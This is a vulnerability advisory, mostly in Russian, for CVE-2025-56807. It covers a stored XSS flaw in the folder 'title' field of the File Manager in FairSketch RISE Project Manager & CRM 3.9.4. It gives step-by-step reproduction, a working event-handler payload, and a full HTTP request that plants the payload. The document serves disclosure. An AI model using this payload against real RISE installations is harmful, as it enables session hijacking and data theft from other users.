
CVE-2025-56807: A Stored Cross Site Scripting (XSS) vulnerability was discovered in FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) in the File Manager functionality.
Обнаружена уязвимость Stored Cross Site Scripting (XSS) в FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) в функциональности File Manager. Уязвимость находится в параметре title, который отправляется при создании новых папок. Из-за недостаточной санитизации ввода злоумышленник может внедрить HTML/JavaScript полезные нагрузки (например: <details/open/ontoggle=prompt(origin)>). Полезная нагрузка сохраняется в имени папки и выполняется при отображении списка папок в File Manager, что позволяет выполнить произвольный JavaScript в браузере любого пользователя, просматривающего соответствующую папку. Это может привести к угону сессии и краже данных.
[!NOTE]
Эта уязвимость не является исключительной для учетных записей администратора. Она может быть использована любой учетной записью пользователя, имеющего разрешение на создание новых папок в File Manager.
Войдите с действительными учетными данными.
Перейдите в Files

Нажмите New Folder

Введите указанную ниже полезную нагрузку в поле Title:
<details/open/ontoggle=prompt(origin)>


POST /index.php/clients/save_folder HTTP/1.1
Host: rise.fairsketch.com
Cookie: [redacted]
Content-Length: 99
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: [redacted]
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://rise.fairsketch.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E